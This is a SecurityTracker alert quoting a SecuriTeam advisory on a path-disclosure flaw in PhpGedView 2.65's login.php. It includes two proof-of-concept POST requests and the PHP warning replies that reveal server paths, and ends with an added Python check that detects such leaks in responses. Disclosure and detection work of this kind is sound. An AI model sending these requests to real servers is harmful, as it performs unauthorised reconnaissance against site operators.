PhpGedView 'login.php' Discloses Installation Path to Remote Users
|
|
SecurityTracker Alert ID: 1008844
|
|
CVE Reference: CAN-2004-0130
|
Updated: Feb 4 2004
|
Original Entry Date: Jan 26 2004
|
Impact: Disclosure of system information, Disclosure of user information
|
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 2.65 and prior versions
|
Description: An information disclosure vulnerability was reported in PhpGedView. A remote user can determine the installation path.
SecuriTeam posted a report credited to Cedric Cochin regarding a flaw in 'login.php' that allows a remote user to determine the installation path.
A remote user can submit a POST request without the username and password variables to cause the system to display the installation path. A remote authenticated user can also submit a POST request that is missing the 'usertime' variable to view the installation path.
|
Impact: A remote user or a remote authenticated user can determine the installation path.
|
Solution: No solution was available at the time of this entry. The vendor reportedly plans to issue a fix shortly in version 2.65.2.
|
Vendor URL: phpgedview.sourceforge.net/
|
Cause: Access control error, Exception handling error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: SecuriTeam <support@securiteam.com>
|
Message History:
None.
|
Source Message Contents
|
Date: 26 Jan 2004 13:13:36 +0200
From: SecuriTeam <support@securiteam.com>
Subject: [UNIX] PhpGedView Path Disclosure Vulnerability
|
PhpGedView Path Disclosure Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://phpGedView.sourceforge.net> phpGedView is an open source system
for online viewing of Gedcom information (family tree and genealogy
information).
A security problem in the product allows attackers to gather the true path
of the server-side script.
DETAILS
Vulnerable Systems:
* phpGedView version 2.65 and prior
The login.php script is not testing if a variable which is supposed to be
POSTed has been defined before using it.
Example:
I - Path disclosure
-- HTTP Client Request --
http://target/phpGedView/login.php POST DATA: action=login
-- HTTP Client Request --
Username and password are missing and will generate a PHP error message
displaying the Real Path.
-- HTTP Server Reply --
<br /> <b>Warning</b>: Undefined index: username in
<b>/var/www/phpGedView/login.php</b> on line <b>36</b><br /> <br />
<b>Warning</b>: Undefined index: password in
<b>/var/www/phpGedView/login.php</b> on line <b>36</b><br /> <br />
<b>Warning</b>: Cannot add header information - headers already sent by
(output started at /var/www/phpGedView/login.php:36) in
<b>/var/www/phpGedView/functions_print.php</b> on line <b>492</b><br />
-- HTTP Server Reply --
-------------------------------------------
II - Path disclosure with a valid user account
-- HTTP Client Request --
http://target/phpGedView/login.php POST DATA:
action=login&url=editconfig.php&usertime=&username=admin&password=login
-- HTTP Client Request --
Username/password must be a valid couple. The usertime is missing and will
generate a PHP error message displaying the Real Path.
-- HTTP Server Reply --
<br /> <b>Warning</b>: strtotime() called with empty time parameter in
<b>/var/www/phpGedView/login.php</b> on line <b>39</b><br /> <br />
<b>Warning</b>: Cannot add header information - headers already sent by
(output started at /var/www/phpGedView/login.php:39) in
<b>/var/www/phpGedView/login.php</b> on line <b>44</b><br />
-- HTTP Server Reply --
Vendor Status:
The vendor has been notified and a release version 2.65.2 with fixes for
all the above mentioned vulnerabilities will be available soon.
ADDITIONAL INFORMATION
The information has been provided by <mailto:cco@netvigilance.com> Cedric Cochin
|
|
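An added example, not part of the SecurityTracker entry or the SecuriTeam advisory: a Python check that scans an HTTP response body for PHP diagnostics of the kind shown in the server replies above and lists the absolute paths they disclose, including the second path inside "headers already sent" messages. The function name `find_path_leaks` and the sample body (constructed from server reply I) are assumptions of this example.

```python
import html
import re

# PHP's HTML error format: <b>Level</b>: message in <b>/path/file.php</b> on line <b>N</b>
DIAG = re.compile(
    r"<b>(?P<level>Warning|Notice|Fatal error|Parse error|Deprecated)</b>:\s*"
    r"(?P<msg>.*?)\s+in\s+<b>(?P<path>[^<]+)</b>\s+on\s+line\s+<b>(?P<line>\d+)</b>",
    re.IGNORECASE,
)
# Second path embedded in "headers already sent by (output started at path:N)".
STARTED_AT = re.compile(r"output started at (?P<path>\S+?):(?P<line>\d+)\)")
# Absolute path on Unix (/...) or Windows (C:\... or C:/...).
ABSOLUTE = re.compile(r"/|[A-Za-z]:[\\/]")

# Constructed sample: two of the warnings from server reply I in the advisory.
SAMPLE_REPLY = """<br /> <b>Warning</b>: Undefined index: username in
<b>/var/www/phpGedView/login.php</b> on line <b>36</b><br /> <br />
<b>Warning</b>: Cannot add header information - headers already sent by (output
started at /var/www/phpGedView/login.php:36) in
<b>/var/www/phpGedView/functions_print.php</b> on line <b>492</b><br />"""


def find_path_leaks(body):
    """Return sorted (path, line, source) tuples for absolute paths leaked in body."""
    # Decode entities and collapse wrapping so a diagnostic split over lines matches.
    text = re.sub(r"\s+", " ", html.unescape(body))
    leaks = set()
    for diag in DIAG.finditer(text):
        if ABSOLUTE.match(diag["path"]):
            leaks.add((diag["path"], int(diag["line"]), diag["level"]))
        # The message text itself can carry another file path.
        for started in STARTED_AT.finditer(diag["msg"]):
            if ABSOLUTE.match(started["path"]):
                leaks.add((started["path"], int(started["line"]), "output started at"))
    return sorted(leaks)


if __name__ == "__main__":
    for path, line, source in find_path_leaks(SAMPLE_REPLY):
        print(f"{source}: {path} (line {line})")
```

Run against responses from a deployment with PHP's `display_errors` turned off, the function should return an empty list, which makes it usable as a regression check.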